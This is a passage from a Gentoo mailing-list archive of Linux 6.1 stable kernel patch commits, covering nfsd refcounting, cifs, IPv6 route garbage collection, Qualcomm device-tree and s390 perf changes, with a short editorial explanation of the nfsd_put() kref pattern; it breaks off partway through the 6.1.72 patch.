AuthorDate: Mon Jan 15 18:47:24 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Jan 15 18:47:24 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=148d2179

Linux patch 6.1.73

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |   4 +
 1072_linux-6.1.73.patch | 294 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 298 insertions(+)

diff --git a/0000_README b/0000_README
index fd657319..9cb280cd 100644
--- a/0000_README
+++ b/0000_README
@@ -331,6 +331,10 @@ Patch:  1071_linux-6.1.72.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.72
 
+Patch:  1072_linux-6.1.73.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.73
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1072_linux-6.1.73.patch b/1072_linux-6.1.73.patch
new file mode 100644
index 00000000..feadcd41
--- /dev/null
+++ b/1072_linux-6.1.73.patch
@@ -0,0 +1,294 @@
+diff --git a/Makefile b/Makefile
+index bad3387b3251c..e4f2d019ca745 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 72
++SUBLEVEL = 73
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/fs/nfsd/nfsctl.c b/fs/nfsd/nfsctl.c
+index b3b4542e31ed5..573de0d49e172 100644
+--- a/fs/nfsd/nfsctl.c
++++ b/fs/nfsd/nfsctl.c
+@@ -716,10 +716,8 @@ static ssize_t __write_ports_addfd(char *buf, struct net *net, const struct cred
+ 
+ 	err = svc_addsock(nn->nfsd_serv, net, fd, buf, SIMPLE_TRANSACTION_LIMIT, cred);
+ 
+-	if (err < 0 && !nn->nfsd_serv->sv_nrthreads && !nn->keep_active)
+-		nfsd_last_thread(net);
+-	else if (err >= 0 &&
+-		 !nn->nfsd_serv->sv_nrthreads && !xchg(&nn->keep_active, 1))
++	if (err >= 0 &&
++	    !nn->nfsd_serv->sv_nrthreads && !xchg(&nn->keep_active, 1))
+ 		svc_get(nn->nfsd_serv);
+ 
+ 	nfsd_put(net);
+@@ -769,9 +767,6 @@ out_close:
+ 		svc_xprt_put(xprt);
+ 	}
+ out_err:
+-	if (!nn->nfsd_serv->sv_nrthreads && !nn->keep_active)
+-		nfsd_last_thread(net);
+-
+ 	nfsd_put(net);
+ 	return err;
+ }
+diff --git a/fs/nfsd/nfsd.h b/fs/nfsd/nfsd.h
+index 53166cce7062c..09726c5b9a317 100644
+--- a/fs/nfsd/nfsd.h
++++ b/fs/nfsd/nfsd.h
+@@ -97,12 +97,7 @@ int		nfsd_pool_stats_open(struct inode *, struct file *);
+ int		nfsd_pool_stats_release(struct inode *, struct file *);
+ void		nfsd_shutdown_threads(struct net *net);
+ 
+-static inline void nfsd_put(struct net *net)
+-{
+-	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
+-
+-	svc_put(nn->nfsd_serv);
+-}
++void		nfsd_put(struct net *net);
+ 
+ bool		i_am_nfsd(void);
+ 
+@@ -139,7 +134,6 @@ int nfsd_vers(struct nfsd_net *nn, int vers, enum vers_op change);
+ int nfsd_minorversion(struct nfsd_net *nn, u32 minorversion, enum vers_op change);
+ void nfsd_reset_versions(struct nfsd_net *nn);
+ int nfsd_create_serv(struct net *net);
+-void nfsd_last_thread(struct net *net);
+ 
+ extern int nfsd_max_blksize;
+ 
+diff --git a/fs/nfsd/nfssvc.c b/fs/nfsd/nfssvc.c
+index 350c6c72f793f..c7695ebd28dc3 100644
+--- a/fs/nfsd/nfssvc.c
++++ b/fs/nfsd/nfssvc.c
+@@ -523,14 +523,9 @@ static struct notifier_block nfsd_inet6addr_notifier = {
+ /* Only used under nfsd_mutex, so this atomic may be overkill: */
+ static atomic_t nfsd_notifier_refcount = ATOMIC_INIT(0);
+ 
+-void nfsd_last_thread(struct net *net)
++static void nfsd_last_thread(struct svc_serv *serv, struct net *net)
+ {
+ 	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
+-	struct svc_serv *serv = nn->nfsd_serv;
+-
+-	spin_lock(&nfsd_notifier_lock);
+-	nn->nfsd_serv = NULL;
+-	spin_unlock(&nfsd_notifier_lock);
+ 
+ 	/* check if the notifier still has clients */
+ 	if (atomic_dec_return(&nfsd_notifier_refcount) == 0) {
+@@ -540,8 +535,6 @@ void nfsd_last_thread(struct net *net)
+ #endif
+ 	}
+ 
+-	svc_xprt_destroy_all(serv, net);
+-
+ 	/*
+ 	 * write_ports can create the server without actually starting
+ 	 * any threads--if we get shut down before any threads are
+@@ -632,8 +625,7 @@ void nfsd_shutdown_threads(struct net *net)
+ 	svc_get(serv);
+ 	/* Kill outstanding nfsd threads */
+ 	svc_set_num_threads(serv, NULL, 0);
+-	nfsd_last_thread(net);
+-	svc_put(serv);
++	nfsd_put(net);
+ 	mutex_unlock(&nfsd_mutex);
+ }
+ 
+@@ -663,6 +655,9 @@ int nfsd_create_serv(struct net *net)
+ 	serv->sv_maxconn = nn->max_connections;
+ 	error = svc_bind(serv, net);
+ 	if (error < 0) {
++		/* NOT nfsd_put() as notifiers (see below) haven't
++		 * been set up yet.
++		 */
+ 		svc_put(serv);
+ 		return error;
+ 	}
+@@ -705,6 +700,29 @@ int nfsd_get_nrthreads(int n, int *nthreads, struct net *net)
+ 	return 0;
+ }
+ 
++/* This is the callback for kref_put() below.
++ * There is no code here as the first thing to be done is
++ * call svc_shutdown_net(), but we cannot get the 'net' from
++ * the kref.  So do all the work when kref_put returns true.
++ */
++static void nfsd_noop(struct kref *ref)
++{
++}
++
++void nfsd_put(struct net *net)
++{
++	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
++
++	if (kref_put(&nn->nfsd_serv->sv_refcnt, nfsd_noop)) {
++		svc_xprt_destroy_all(nn->nfsd_serv, net);
++		nfsd_last_thread(nn->nfsd_serv, net);
++		svc_destroy(&nn->nfsd_serv->sv_refcnt);
++		spin_lock(&nfsd_notifier_lock);
++		nn->nfsd_serv = NULL;
++		spin_unlock(&nfsd_notifier_lock);
++	}
++}
++
+ int nfsd_set_nrthreads(int n, int *nthreads, struct net *net)
+ {
+ 	int i = 0;
+@@ -755,7 +773,7 @@ int nfsd_set_nrthreads(int n, int *nthreads, struct net *net)
+ 		if (err)
+ 			break;
+ 	}
+-	svc_put(nn->nfsd_serv);
++	nfsd_put(net);
+ 	return err;
+ }
+ 
+@@ -770,7 +788,6 @@ nfsd_svc(int nrservs, struct net *net, const struct cred *cred)
+ 	int	error;
+ 	bool	nfsd_up_before;
+ 	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
+-	struct svc_serv *serv;
+ 
+ 	mutex_lock(&nfsd_mutex);
+ 	dprintk("nfsd: creating service\n");
+@@ -790,25 +807,22 @@ nfsd_svc(int nrservs, struct net *net, const struct cred *cred)
+ 		goto out;
+ 
+ 	nfsd_up_before = nn->nfsd_net_up;
+-	serv = nn->nfsd_serv;
+ 
+ 	error = nfsd_startup_net(net, cred);
+ 	if (error)
+ 		goto out_put;
+-	error = svc_set_num_threads(serv, NULL, nrservs);
++	error = svc_set_num_threads(nn->nfsd_serv, NULL, nrservs);
+ 	if (error)
+ 		goto out_shutdown;
+-	error = serv->sv_nrthreads;
+-	if (error == 0)
+-		nfsd_last_thread(net);
++	error = nn->nfsd_serv->sv_nrthreads;
+ out_shutdown:
+ 	if (error < 0 && !nfsd_up_before)
+ 		nfsd_shutdown_net(net);
+ out_put:
+ 	/* Threads now hold service active */
+ 	if (xchg(&nn->keep_active, 0))
+-		svc_put(serv);
+-	svc_put(serv);
++		nfsd_put(net);
++	nfsd_put(net);
+ out:
+ 	mutex_unlock(&nfsd_mutex);
+ 	return error;
+diff --git a/fs/smb/client/cifsfs.c b/fs/smb/client/cifsfs.c
+index 2e15b182e59fc..7286a56aebfa9 100644
+--- a/fs/smb/client/cifsfs.c
++++ b/fs/smb/client/cifsfs.c
+@@ -1240,7 +1240,7 @@ static int cifs_flush_folio(struct inode *inode, loff_t pos, loff_t *_fstart, lo
+ 	int rc = 0;
+ 
+ 	folio = filemap_get_folio(inode->i_mapping, index);
+-	if (IS_ERR(folio))
++	if (!folio)
+ 		return 0;
+ 
+ 	size = folio_size(folio);
+diff --git a/include/net/dst_ops.h b/include/net/dst_ops.h
+index 88ff7bb2bb9bd..632086b2f644a 100644
+--- a/include/net/dst_ops.h
++++ b/include/net/dst_ops.h
+@@ -16,7 +16,7 @@ struct dst_ops {
+ 	unsigned short		family;
+ 	unsigned int		gc_thresh;
+ 
+-	int			(*gc)(struct dst_ops *ops);
++	void			(*gc)(struct dst_ops *ops);
+ 	struct dst_entry *	(*check)(struct dst_entry *, __u32 cookie);
+ 	unsigned int		(*default_advmss)(const struct dst_entry *);
+ 	unsigned int		(*mtu)(const struct dst_entry *);
+diff --git a/net/core/dst.c b/net/core/dst.c
+index bc9c9be4e0801..d178c564138ee 100644
+--- a/net/core/dst.c
++++ b/net/core/dst.c
+@@ -82,12 +82,8 @@ void *dst_alloc(struct dst_ops *ops, struct net_device *dev,
+ 
+ 	if (ops->gc &&
+ 	    !(flags & DST_NOCOUNT) &&
+-	    dst_entries_get_fast(ops) > ops->gc_thresh) {
+-		if (ops->gc(ops)) {
+-			pr_notice_ratelimited("Route cache is full: consider increasing sysctl net.ipv6.route.max_size.\n");
+-			return NULL;
+-		}
+-	}
++	    dst_entries_get_fast(ops) > ops->gc_thresh)
++		ops->gc(ops);
+ 
+ 	dst = kmem_cache_alloc(ops->kmem_cachep, GFP_ATOMIC);
+ 	if (!dst)
+diff --git a/net/ipv6/route.c b/net/ipv6/route.c
+index 0bcdb675ba2c1..7f65dc750feb8 100644
+--- a/net/ipv6/route.c
++++ b/net/ipv6/route.c
+@@ -91,7 +91,7 @@ static struct dst_entry *ip6_negative_advice(struct dst_entry *);
+ static void		ip6_dst_destroy(struct dst_entry *);
+ static void		ip6_dst_ifdown(struct dst_entry *,
+ 				       struct net_device *dev, int how);
+-static int		 ip6_dst_gc(struct dst_ops *ops);
++static void		 ip6_dst_gc(struct dst_ops *ops);
+ 
+ static int		ip6_pkt_discard(struct sk_buff *skb);
+ static int		ip6_pkt_discard_out(struct net *net, struct sock *sk, struct sk_buff *skb);
+@@ -3288,11 +3288,10 @@ out:
+ 	return dst;
+ }
+ 
+-static int ip6_dst_gc(struct dst_ops *ops)
++static void ip6_dst_gc(struct dst_ops *ops)
+ {
+ 	struct net *net = container_of(ops, struct net, ipv6.ip6_dst_ops);
+ 	int rt_min_interval = net->ipv6.sysctl.ip6_rt_gc_min_interval;
+-	int rt_max_size = net->ipv6.sysctl.ip6_rt_max_size;
+ 	int rt_elasticity = net->ipv6.sysctl.ip6_rt_gc_elasticity;
+ 	int rt_gc_timeout = net->ipv6.sysctl.ip6_rt_gc_timeout;
+ 	unsigned long rt_last_gc = net->ipv6.ip6_rt_last_gc;
+@@ -3300,11 +3299,10 @@ static int ip6_dst_gc(struct dst_ops *ops)
+ 	int entries;
+ 
+ 	entries = dst_entries_get_fast(ops);
+-	if (entries > rt_max_size)
++	if (entries > ops->gc_thresh)
+ 		entries = dst_entries_get_slow(ops);
+ 
+-	if (time_after(rt_last_gc + rt_min_interval, jiffies) &&
+-	    entries <= rt_max_size)
++	if (time_after(rt_last_gc + rt_min_interval, jiffies))
+ 		goto out;
+ 
+ 	fib6_run_gc(atomic_inc_return(&net->ipv6.ip6_rt_gc_expire), net, true);
+@@ -3314,7 +3312,6 @@ static int ip6_dst_gc(struct dst_ops *ops)
+ out:
+ 	val = atomic_read(&net->ipv6.ip6_rt_gc_expire);
+ 	atomic_set(&net->ipv6.ip6_rt_gc_expire, val - (val >> rt_elasticity));
+-	return entries > rt_max_size;
+ }
+ 
+ static int ip6_nh_lookup_table(struct net *net, struct fib6_config *cfg,
+@@ -6517,7 +6514,7 @@ static int __net_init ip6_route_net_init(struct net *net)
+ #endif
+ 
+ 	net->ipv6.sysctl.flush_delay = 0;
+-	net->ipv6.sysctl.ip6_rt_max_size = 4096;
++	net->ipv6.sysctl.ip6_rt_max_size = INT_MAX;
+ 	net->ipv6.sysctl.ip6_rt_gc_min_interval = HZ / 2;
+ 	net->ipv6.sysctl.ip6_rt_gc_timeout = 60*HZ;
+ 	net->ipv6.sysctl.ip6_rt_gc_interval = 30*HZ;


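[Editorial note, not part of the patch above] The nfsd hunks in 1072_linux-6.1.73.patch reinstate routing every release through nfsd_put(), which wraps kref_put() with a deliberately empty release callback: the teardown needs the 'net' pointer that the kref cannot carry, so the caller runs it only when kref_put() reports that the count hit zero. A minimal userspace analogue of that pattern (hypothetical names, C11 atomics standing in for struct kref):

#include <stdatomic.h>
#include <stdbool.h>

struct serv {
	atomic_int refcnt;
};

/* Analogue of kref_put() with a no-op release: report whether this
 * call dropped the last reference, and let the caller perform the
 * teardown that needs context the refcount itself cannot carry. */
static bool serv_put(struct serv *s)
{
	/* atomic_fetch_sub() returns the previous value, so 1 means
	 * this call took the count to zero. */
	return atomic_fetch_sub(&s->refcnt, 1) == 1;
}

int main(void)
{
	struct serv s = { .refcnt = 2 };

	serv_put(&s);		/* other references remain */
	if (serv_put(&s)) {
		/* last reference gone: destroy transports, clear the
		 * owning pointer, etc., as nfsd_put() does above */
	}
	return 0;
}
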
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-01-10 17:16 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-01-10 17:16 UTC (permalink / raw
  To: gentoo-commits

commit:     196a597abd58ced0797e50134ddbe5f75714edec
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Jan 10 17:16:49 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Jan 10 17:16:49 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=196a597a

Linux patch 6.1.72

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1071_linux-6.1.72.patch | 9332 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 9336 insertions(+)

diff --git a/0000_README b/0000_README
index 248cb097..fd657319 100644
--- a/0000_README
+++ b/0000_README
@@ -327,6 +327,10 @@ Patch:  1070_linux-6.1.71.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.71
 
+Patch:  1071_linux-6.1.72.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.72
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1071_linux-6.1.72.patch b/1071_linux-6.1.72.patch
new file mode 100644
index 00000000..2496793b
--- /dev/null
+++ b/1071_linux-6.1.72.patch
@@ -0,0 +1,9332 @@
+diff --git a/MAINTAINERS b/MAINTAINERS
+index 07a9c274c0e29..13d1078808bb5 100644
+--- a/MAINTAINERS
++++ b/MAINTAINERS
+@@ -10803,6 +10803,8 @@ L:	linux-kernel@vger.kernel.org
+ S:	Maintained
+ T:	git git://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git irq/core
+ F:	kernel/irq/
++F:	include/linux/group_cpus.h
++F:	lib/group_cpus.c
+ 
+ IRQCHIP DRIVERS
+ M:	Thomas Gleixner <tglx@linutronix.de>
+diff --git a/Makefile b/Makefile
+index 2840e36fd5596..bad3387b3251c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 71
++SUBLEVEL = 72
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/Kconfig b/arch/Kconfig
+index b60d271bf76a9..14273a6203dfc 100644
+--- a/arch/Kconfig
++++ b/arch/Kconfig
+@@ -34,6 +34,9 @@ config ARCH_HAS_SUBPAGE_FAULTS
+ config HOTPLUG_SMT
+ 	bool
+ 
++config SMT_NUM_THREADS_DYNAMIC
++	bool
++
+ config GENERIC_ENTRY
+        bool
+ 
+diff --git a/arch/arm/mach-sunxi/mc_smp.c b/arch/arm/mach-sunxi/mc_smp.c
+index 26cbce1353387..b2f5f4f28705f 100644
+--- a/arch/arm/mach-sunxi/mc_smp.c
++++ b/arch/arm/mach-sunxi/mc_smp.c
+@@ -808,12 +808,12 @@ static int __init sunxi_mc_smp_init(void)
+ 			break;
+ 	}
+ 
+-	is_a83t = sunxi_mc_smp_data[i].is_a83t;
+-
+ 	of_node_put(node);
+ 	if (ret)
+ 		return -ENODEV;
+ 
++	is_a83t = sunxi_mc_smp_data[i].is_a83t;
++
+ 	if (!sunxi_mc_smp_cpu_table_init())
+ 		return -EINVAL;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-cheza.dtsi b/arch/arm64/boot/dts/qcom/sdm845-cheza.dtsi
+index a5c0c788969fb..43ee28db61aa8 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-cheza.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845-cheza.dtsi
+@@ -150,15 +150,15 @@
+ };
+ 
+ &psci {
+-	/delete-node/ cpu0;
+-	/delete-node/ cpu1;
+-	/delete-node/ cpu2;
+-	/delete-node/ cpu3;
+-	/delete-node/ cpu4;
+-	/delete-node/ cpu5;
+-	/delete-node/ cpu6;
+-	/delete-node/ cpu7;
+-	/delete-node/ cpu-cluster0;
++	/delete-node/ power-domain-cpu0;
++	/delete-node/ power-domain-cpu1;
++	/delete-node/ power-domain-cpu2;
++	/delete-node/ power-domain-cpu3;
++	/delete-node/ power-domain-cpu4;
++	/delete-node/ power-domain-cpu5;
++	/delete-node/ power-domain-cpu6;
++	/delete-node/ power-domain-cpu7;
++	/delete-node/ power-domain-cluster;
+ };
+ 
+ &cpus {
+@@ -351,7 +351,9 @@
+ 
+ 
+ &apps_rsc {
+-	pm8998-rpmh-regulators {
++	/delete-property/ power-domains;
++
++	regulators-0 {
+ 		compatible = "qcom,pm8998-rpmh-regulators";
+ 		qcom,pmic-id = "a";
+ 
+@@ -633,7 +635,7 @@
+ 		};
+ 	};
+ 
+-	pm8005-rpmh-regulators {
++	regulators-1 {
+ 		compatible = "qcom,pm8005-rpmh-regulators";
+ 		qcom,pmic-id = "c";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+index c9efcb894a52f..8c9ccf5b4ea41 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-db845c.dts
+@@ -271,7 +271,7 @@
+ };
+ 
+ &apps_rsc {
+-	pm8998-rpmh-regulators {
++	regulators-0 {
+ 		compatible = "qcom,pm8998-rpmh-regulators";
+ 		qcom,pmic-id = "a";
+ 		vdd-s1-supply = <&vph_pwr>;
+@@ -396,7 +396,7 @@
+ 		};
+ 	};
+ 
+-	pmi8998-rpmh-regulators {
++	regulators-1 {
+ 		compatible = "qcom,pmi8998-rpmh-regulators";
+ 		qcom,pmic-id = "b";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-lg-common.dtsi b/arch/arm64/boot/dts/qcom/sdm845-lg-common.dtsi
+index 20f275f8694dc..e2921640880a1 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-lg-common.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845-lg-common.dtsi
+@@ -166,7 +166,7 @@
+ };
+ 
+ &apps_rsc {
+-	pm8998-rpmh-regulators {
++	regulators-0 {
+ 		compatible = "qcom,pm8998-rpmh-regulators";
+ 		qcom,pmic-id = "a";
+ 
+@@ -419,7 +419,7 @@
+ 		};
+ 	};
+ 
+-	pmi8998-rpmh-regulators {
++	regulators-1 {
+ 		compatible = "qcom,pmi8998-rpmh-regulators";
+ 		qcom,pmic-id = "b";
+ 
+@@ -433,7 +433,7 @@
+ 		};
+ 	};
+ 
+-	pm8005-rpmh-regulators {
++	regulators-2 {
+ 		compatible = "qcom,pm8005-rpmh-regulators";
+ 		qcom,pmic-id = "c";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-mtp.dts b/arch/arm64/boot/dts/qcom/sdm845-mtp.dts
+index 64958dee17d8b..b47e333aa3510 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-mtp.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-mtp.dts
+@@ -117,7 +117,7 @@
+ };
+ 
+ &apps_rsc {
+-	pm8998-rpmh-regulators {
++	regulators-0 {
+ 		compatible = "qcom,pm8998-rpmh-regulators";
+ 		qcom,pmic-id = "a";
+ 
+@@ -382,7 +382,7 @@
+ 		};
+ 	};
+ 
+-	pmi8998-rpmh-regulators {
++	regulators-1 {
+ 		compatible = "qcom,pmi8998-rpmh-regulators";
+ 		qcom,pmic-id = "b";
+ 
+@@ -396,7 +396,7 @@
+ 		};
+ 	};
+ 
+-	pm8005-rpmh-regulators {
++	regulators-2 {
+ 		compatible = "qcom,pm8005-rpmh-regulators";
+ 		qcom,pmic-id = "c";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-oneplus-common.dtsi b/arch/arm64/boot/dts/qcom/sdm845-oneplus-common.dtsi
+index 392461c29e76e..0713b774a97be 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-oneplus-common.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845-oneplus-common.dtsi
+@@ -144,7 +144,7 @@
+ };
+ 
+ &apps_rsc {
+-	pm8998-rpmh-regulators {
++	regulators-0 {
+ 		compatible = "qcom,pm8998-rpmh-regulators";
+ 		qcom,pmic-id = "a";
+ 
+@@ -280,7 +280,7 @@
+ 		};
+ 	};
+ 
+-	pmi8998-rpmh-regulators {
++	regulators-1 {
+ 		compatible = "qcom,pmi8998-rpmh-regulators";
+ 		qcom,pmic-id = "b";
+ 
+@@ -294,7 +294,7 @@
+ 		};
+ 	};
+ 
+-	pm8005-rpmh-regulators {
++	regulators-2 {
+ 		compatible = "qcom,pm8005-rpmh-regulators";
+ 		qcom,pmic-id = "c";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-shift-axolotl.dts b/arch/arm64/boot/dts/qcom/sdm845-shift-axolotl.dts
+index 83261c9bb4f23..b65c35865dab9 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-shift-axolotl.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-shift-axolotl.dts
+@@ -110,7 +110,7 @@
+ };
+ 
+ &apps_rsc {
+-	pm8998-rpmh-regulators {
++	regulators-0 {
+ 		compatible = "qcom,pm8998-rpmh-regulators";
+ 		qcom,pmic-id = "a";
+ 
+@@ -375,7 +375,7 @@
+ 		};
+ 	};
+ 
+-	pmi8998-rpmh-regulators {
++	regulators-1 {
+ 		compatible = "qcom,pmi8998-rpmh-regulators";
+ 		qcom,pmic-id = "b";
+ 
+@@ -389,7 +389,7 @@
+ 		};
+ 	};
+ 
+-	pm8005-rpmh-regulators {
++	regulators-2 {
+ 		compatible = "qcom,pm8005-rpmh-regulators";
+ 		qcom,pmic-id = "c";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-sony-xperia-tama.dtsi b/arch/arm64/boot/dts/qcom/sdm845-sony-xperia-tama.dtsi
+index d6918e6d19799..249a715d5aae1 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-sony-xperia-tama.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845-sony-xperia-tama.dtsi
+@@ -78,7 +78,7 @@
+ };
+ 
+ &apps_rsc {
+-	pm8998-rpmh-regulators {
++	regulators-0 {
+ 		compatible = "qcom,pm8998-rpmh-regulators";
+ 		qcom,pmic-id = "a";
+ 
+@@ -308,7 +308,7 @@
+ 		};
+ 	};
+ 
+-	pmi8998-rpmh-regulators {
++	regulators-1 {
+ 		compatible = "qcom,pmi8998-rpmh-regulators";
+ 		qcom,pmic-id = "b";
+ 
+@@ -319,7 +319,7 @@
+ 		};
+ 	};
+ 
+-	pm8005-rpmh-regulators {
++	regulators-2 {
+ 		compatible = "qcom,pm8005-rpmh-regulators";
+ 		qcom,pmic-id = "c";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-beryllium.dts b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-beryllium.dts
+index 0f470cf1ed1c1..6d6b3dd699475 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-beryllium.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-beryllium.dts
+@@ -125,7 +125,7 @@
+ };
+ 
+ &apps_rsc {
+-	pm8998-rpmh-regulators {
++	regulators-0 {
+ 		compatible = "qcom,pm8998-rpmh-regulators";
+ 		qcom,pmic-id = "a";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
+index 093b04359ec39..ffbe45a99b74a 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-xiaomi-polaris.dts
+@@ -143,7 +143,7 @@
+ };
+ 
+ &apps_rsc {
+-	pm8998-rpmh-regulators {
++	regulators-0 {
+ 		compatible = "qcom,pm8998-rpmh-regulators";
+ 		qcom,pmic-id = "a";
+ 
+@@ -343,7 +343,7 @@
+ 		};
+ 	};
+ 
+-	pmi8998-rpmh-regulators {
++	regulators-1 {
+ 		compatible = "qcom,pmi8998-rpmh-regulators";
+ 		qcom,pmic-id = "b";
+ 
+@@ -355,7 +355,7 @@
+ 		};
+ 	};
+ 
+-	pm8005-rpmh-regulators {
++	regulators-2 {
+ 		compatible = "qcom,pm8005-rpmh-regulators";
+ 		qcom,pmic-id = "c";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm850-lenovo-yoga-c630.dts b/arch/arm64/boot/dts/qcom/sdm850-lenovo-yoga-c630.dts
+index 74f43da51fa50..48a41ace8fc58 100644
+--- a/arch/arm64/boot/dts/qcom/sdm850-lenovo-yoga-c630.dts
++++ b/arch/arm64/boot/dts/qcom/sdm850-lenovo-yoga-c630.dts
+@@ -99,7 +99,7 @@
+ };
+ 
+ &apps_rsc {
+-	pm8998-rpmh-regulators {
++	regulators-0 {
+ 		compatible = "qcom,pm8998-rpmh-regulators";
+ 		qcom,pmic-id = "a";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm850-samsung-w737.dts b/arch/arm64/boot/dts/qcom/sdm850-samsung-w737.dts
+index d028a7eb364a6..c169d2870bdf4 100644
+--- a/arch/arm64/boot/dts/qcom/sdm850-samsung-w737.dts
++++ b/arch/arm64/boot/dts/qcom/sdm850-samsung-w737.dts
+@@ -129,7 +129,7 @@
+ };
+ 
+ &apps_rsc {
+-	pm8998-rpmh-regulators {
++	regulators-0 {
+ 		compatible = "qcom,pm8998-rpmh-regulators";
+ 		qcom,pmic-id = "a";
+ 
+diff --git a/arch/s390/kernel/perf_cpum_cf.c b/arch/s390/kernel/perf_cpum_cf.c
+index f043a7ff220b7..28fa80fd69fa0 100644
+--- a/arch/s390/kernel/perf_cpum_cf.c
++++ b/arch/s390/kernel/perf_cpum_cf.c
+@@ -2,7 +2,7 @@
+ /*
+  * Performance event support for s390x - CPU-measurement Counter Facility
+  *
+- *  Copyright IBM Corp. 2012, 2021
++ *  Copyright IBM Corp. 2012, 2022
+  *  Author(s): Hendrik Brueckner <brueckner@linux.ibm.com>
+  *	       Thomas Richter <tmricht@linux.ibm.com>
+  */
+@@ -434,6 +434,12 @@ static void cpumf_hw_inuse(void)
+ 	mutex_unlock(&pmc_reserve_mutex);
+ }
+ 
++static int is_userspace_event(u64 ev)
++{
++	return cpumf_generic_events_user[PERF_COUNT_HW_CPU_CYCLES] == ev ||
++	       cpumf_generic_events_user[PERF_COUNT_HW_INSTRUCTIONS] == ev;
++}
++
+ static int __hw_perf_event_init(struct perf_event *event, unsigned int type)
+ {
+ 	struct perf_event_attr *attr = &event->attr;
+@@ -456,19 +462,26 @@ static int __hw_perf_event_init(struct perf_event *event, unsigned int type)
+ 		if (is_sampling_event(event))	/* No sampling support */
+ 			return -ENOENT;
+ 		ev = attr->config;
+-		/* Count user space (problem-state) only */
+ 		if (!attr->exclude_user && attr->exclude_kernel) {
+-			if (ev >= ARRAY_SIZE(cpumf_generic_events_user))
+-				return -EOPNOTSUPP;
+-			ev = cpumf_generic_events_user[ev];
+-
+-		/* No support for kernel space counters only */
++			/*
++			 * Count user space (problem-state) only
++			 * Handle events 32 and 33 as 0:u and 1:u
++			 */
++			if (!is_userspace_event(ev)) {
++				if (ev >= ARRAY_SIZE(cpumf_generic_events_user))
++					return -EOPNOTSUPP;
++				ev = cpumf_generic_events_user[ev];
++			}
+ 		} else if (!attr->exclude_kernel && attr->exclude_user) {
++			/* No support for kernel space counters only */
+ 			return -EOPNOTSUPP;
+-		} else {	/* Count user and kernel space */
+-			if (ev >= ARRAY_SIZE(cpumf_generic_events_basic))
+-				return -EOPNOTSUPP;
+-			ev = cpumf_generic_events_basic[ev];
++		} else {
++			/* Count user and kernel space, incl. events 32 + 33 */
++			if (!is_userspace_event(ev)) {
++				if (ev >= ARRAY_SIZE(cpumf_generic_events_basic))
++					return -EOPNOTSUPP;
++				ev = cpumf_generic_events_basic[ev];
++			}
+ 		}
+ 		break;
+ 
